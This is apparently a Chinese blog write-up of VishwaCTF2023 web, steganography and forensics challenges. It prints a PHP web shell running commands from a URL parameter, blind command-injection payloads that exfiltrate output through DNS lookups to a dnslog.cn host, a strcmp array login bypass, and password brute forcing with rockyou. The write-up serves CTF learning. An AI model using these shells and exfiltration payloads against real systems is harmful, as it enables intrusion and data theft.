【VishwaCTF2023】wp

最新推荐文章于 2024-03-25 13:12:17 发布
最新推荐文章于 2024-03-25 13:12:17 发布
阅读量312 收藏 1
点赞数
分类专栏: wp 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/129967838
版权

【VishwaCTF2023】wp

web

Payload

目录扫描,扫描到了robots.txt

image-20230404151550711

我们访问/robots.txt

<?php
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
    else {
        if(isset($_GET['btn'])){
            echo "<b>System Details: </b>";
            system("uname -a"); 
        }
    }
?>

uname(英文全拼:unix name)命令用于显示操作系统信息,例如内核版本、主机名、处理器类型等。。

uname 可显示电脑以及操作系统的相关信息。-a表示所有

很明显,这是命令执行,我们直接传参即可:

image-20230404151920194

发现flag藏在环境变量中

Mascot

扫描一下目录,发现git泄露:

image-20230404152202468

但是我们使用GitHack下载不下来,但是里面有一个 FLAGGGGG.md

image-20230404152658487

下载得到flag

Eeezzy

I forgot my login details again!

view.php

<?php

    session_start();
    $_SESSION['status']=null;

    $flag="";
    try {
        if (isset($_GET['username']) && isset($_GET['password'])) {
            if (strcmp($_GET['username'], $flag)==0 && strcmp($_GET['password'], $flag)==0)
                $_SESSION['status']=$flag;
            else
                $_SESSION['status']="Invalid username or password";
        }
    } catch (Throwable $th) {
        $_SESSION['status']=$flag;
    }

?>

strcmp()函数可以使用数组绕过,

strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错,出错后返回值0,正是利用这点进行绕过。

这里我们只能让password为数组:

image-20230404154539089

aLive

In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.

image-20230404161910385

打开发现一个可以检测站点的输入框,检测只会提示是否active,并没有回显

看了wp,我知道了需要使用DNSlog平台,之前了解过,但是没有使用过DNSlog

什么是DNSlog?

在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。

DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和 IP 地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相应的服务。

了解到了什么是 DNS,那么什么又是 DNSlog 呢?

DNSlog 就是存储在 DNS Server 上的域名信息,它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件

我们使用DNSlog平台,生成一个DNS服务器:

image-20230404162337417

然后我们使用输入框输入该域名,记得加上三级域名:

123.r736ym.dnslog.cn
image-20230404162601657

成功外带,回显数据。

测试了一下,发现是RCE,于是我们如下构造:

`whoami`.r736ym.dnslog.cn

成功命令执行,说明是root用户

image-20230404162819440 
`sort f*`.r736ym.dnslog.cn
image-20230404162930890

获得flag

spooky

I forgot my login credentials again!!

一个登录界面,sql注入无果,使用dirsearch扫描:

image-20230404184137206

访问/sitemap.xml

image-20230404184245867

发现存放用户名和密码的文件,我们使用bp爆破一下:

image-20230404184326412

注意攻击模式要选择这种(能够计算笛卡尔积)保证所有情况

image-20230404184414191

使用账号密码登录

image-20230404184600637

提示权限为user,可能需要改为admin

image-20230404184640710

加上 &admin=true

Steganography

Can you see me?

A magician made the seven wonders disappear. But people claim they can still feel their presence in the air.

将图片使用foremost分离,得到一个压缩包,里面有一个wav文件,我们使用Audacity打开:

image-20230404180624552

选择频谱图,得到flag

Guatemala

使用010打开文件,发现是GIF图片

image-20230404181143781

发现一串base64编码:

image-20230404181545407

或者使用exiftool

image-20230404181922920

解码得到flag:

image-20230404181643275
I LOVE YOU

There is an audio file given below… It is not so difficult but you will find it’s sound very deep

根据提示,我们使用 DeepSound 去分离隐写在wav中的文件:

image-20230404193252238

得到welcome.exe,看图标,很想使用python打包的exe文件,

我们使用工具pyinstxtractor进行反汇编:

image-20230404193422962

然后使用pyc反编译网站进行反编译,得到flag

image-20230404193515571

Forensics

The Sender Conundrum

Marcus Got a Mysterious mail promising a flag if he could crack the password to the file.

打开电子邮件,叫我们猜一个人名

Hello Marcus Cooper,
You are one step behind from finding your flag. 
Here is a Riddle: 
I am a noun and not a verb or an adverb.
I am given to you at birth and never taken away,
You keep me until you die, come what may.
What am I?

我们使用字典进行爆破,但是都没有,最后使用了kali自带的词典:rockyou.txt,爆到了

image-20230404215130384

解压得flag

Leekos
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[vishwaCTF-2021]wp
Huamang的博客
03-15 1930
Is Js Necessary? 打开网页过了一下会重定向,直接保存下html来可以仔细分析 直接禁用javascript会有隐藏的提交框出现 <form action="https://isjsnecessary.vishwactf.com/" method="post"> <input type="text" placeholder="your answer" name="yourinput" id="yourinput"> <input type="submit" nam
CTF WP记录 ---web
yiyisuzhi的博客
11-08 816
说明:本人网安小白,单纯的想记录通过CTF来巩固自己所学的知识,见证自己的成长 flag:一周四篇,不定期更新,从零开始,前期尽量解释清楚涉及到的所有知识点。 第一题:“百度杯”CTF比赛 2017 二月场 爆破-1 打开题目连接直接显示了一段代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);");
ctf wp
qq_63267612的博客
04-03 2787
文章目录被嗅探的流量镜子里的世界隐藏的钥匙另外一个世界神秘龙卷风[第一章 web入门]常见的搜集web签到 被嗅探的流量 下载后打开题目没有思路,查看别人的wp发现是文件传输找POST的包,用wireshark追踪http流量 http.request.method==POST在文件末尾找到flag 镜子里的世界 打开后是一张图片,隐写套路,查看属性,用winhex打开都没发现什么有用的信息,这时注意到图片名steg想到了用stegslove打开图片,查看图片并没有发现有用的信息,调整后发现flag 隐
CTF_WP-攻防世界web题解
最新发布
qq_63600223的博客
03-25 1980
题目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
ctf wp 汇总
freshfox的博客
07-06 1055
ctf
VishwaCTF 2022 部分wp
qq_61768489的博客
03-22 3863
学长推荐的一个相对平易近人的ctf,对我这种菜鸡友好一点, 就想着web要多写几道出来毕竟简单的比赛不常见, 继续加油积累经验吧 My Useless Website 一个最简单的sql 万能密码注入 Stock Bot 注意源码,有hint, 主要就是注意到这个提示了,根据路径直接查Flag Hey Buddy! 这题考点是SSTI ,大佬们也许一眼就看出来了,所谓经验重要性 我这里也就是猜的,然后看到这里get传入name,就很可能 所以先尝试一下...
2023年江西省工业互联网大赛WP
12-25
2023年江西省工业互联网大赛WP
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
CTF_Web:攻防世界高手区进阶题WP(19-21)
AFCC_的博客(Web_Dog)
09-09 1623
NSCTFweb2题解 打开题目直接是一段代码,提示逆向即为flag,首先看代码: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){
2021 长城杯ctf wp
qq_45603443的博客
09-20 4710
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
中国地质大学(武汉)GUCTF2023 个人wp
qq_41626232的博客
03-19 538
中国地质大学(武汉)第四届CTF 个人wp
阿里云CTF2023 字节码跳动 wp (javascript字节码)
weixin_42100211的博客
04-23 1168
我的第一道javascript字节码逆向。
VishwaCTF 2022
qq_53263789的博客
03-29 340
title: VishwaCTF 2022 categories: 赛题wp 记录两题 Flag .Collection 一道 firebase 的题目,记录一下 首页 照例看一下网页源码,截取一下重要部分 一段混淆代码,但是有一个url 一个firebaseConfig设置 通过API KEY操作 firebase,猜测baseURL就是上面的url <!DOCTYPE html> <html lang="en"> <head> <meta .
2021-06-22ctf学习wp模板
qq_45358242的博客
07-17 504
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
GDOUCTF2023-misc方向WP
toto的博客
04-16 1927
有问题或交流可联系Q:2282679004。
命令注入
weixin_51855956的博客
04-12 201
利用php文件进行命令注入的几种方法(添加参数可执行DOS命令): 1.system() system.php <meta charset='gb2312'> <?php if(isset($_GET['cmd'])){ echo "<pre>"; system($_GET['cmd']); }?> URL中接入?cmd=DOS命令 例:?cmd=ipconfig //查看IP 2.exec() exec.php <meta charset="
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: ...根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值